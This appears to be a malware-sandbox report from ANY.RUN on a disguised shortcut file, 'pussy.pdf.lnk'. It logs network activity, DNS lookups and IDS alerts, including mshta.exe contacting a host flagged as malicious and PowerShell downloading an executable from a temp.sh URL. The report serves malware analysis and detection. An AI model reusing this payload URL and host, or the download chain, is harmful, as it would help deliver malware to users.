http://ocsp.godaddy.com//MEIwQDA%2BMDwwOjAJBgUrDgMCGgUABBQdI2%2BOBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc%3D
unknown
whitelisted
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4988
powershell.exe
GET
200
51.91.79.17:80
http://temp.sh/Oefpj/putty.exe
unknown
unknown
7656
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7656
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6768
Acrobat.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAfy81yHqHeveu%2FpR5k1Jb0%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5496
MoUsoCoreWorker.exe
2.19.11.120:80
crl.microsoft.com
Elisa Oyj
NL
whitelisted
5496
MoUsoCoreWorker.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
1672
mshta.exe
199.101.134.238:443
www.4sync.com
WZCOM
US
whitelisted
1672
mshta.exe
192.124.249.41:80
ocsp.godaddy.com
SUCURI-SEC
US
whitelisted
1672
mshta.exe
204.155.149.26:443
dc545.4sync.com
WZCOM
US
malicious
6544
svchost.exe
40.126.32.133:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 216.58.206.78
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 2.19.11.120
  • 2.19.11.105
whitelisted
www.microsoft.com
  • 2.23.246.101
  • 23.35.229.160
whitelisted
client.wns.windows.com
  • 172.211.123.249
  • 172.211.123.250
whitelisted
www.4sync.com
  • 199.101.134.238
  • 204.155.149.140
whitelisted
ocsp.godaddy.com
  • 192.124.249.41
  • 192.124.249.36
  • 192.124.249.24
  • 192.124.249.22
  • 192.124.249.23
whitelisted
dc545.4sync.com
  • 204.155.149.26
malicious
login.live.com
  • 40.126.32.133
  • 20.190.160.14
  • 20.190.160.66
  • 40.126.32.140
  • 20.190.160.128
  • 20.190.160.4
  • 40.126.32.68
  • 40.126.32.74
whitelisted
ocsp.digicert.com
  • 2.23.77.188
  • 184.30.131.245
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Misc activity
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (4sync .com)
1672
mshta.exe
Misc activity
ET FILE_SHARING Observed File Sharing Related Domain (4sync .com) in TLS SNI
2196
svchost.exe
Misc activity
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (4sync .com)
1672
mshta.exe
Misc activity
ET FILE_SHARING Observed File Sharing Related Domain (4sync .com) in TLS SNI
4988
powershell.exe
Potentially Bad Traffic
ET HUNTING Possibly Suspicious Request for Putty.exe from Non-Standard Download Location
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
pussy.pdf.lnk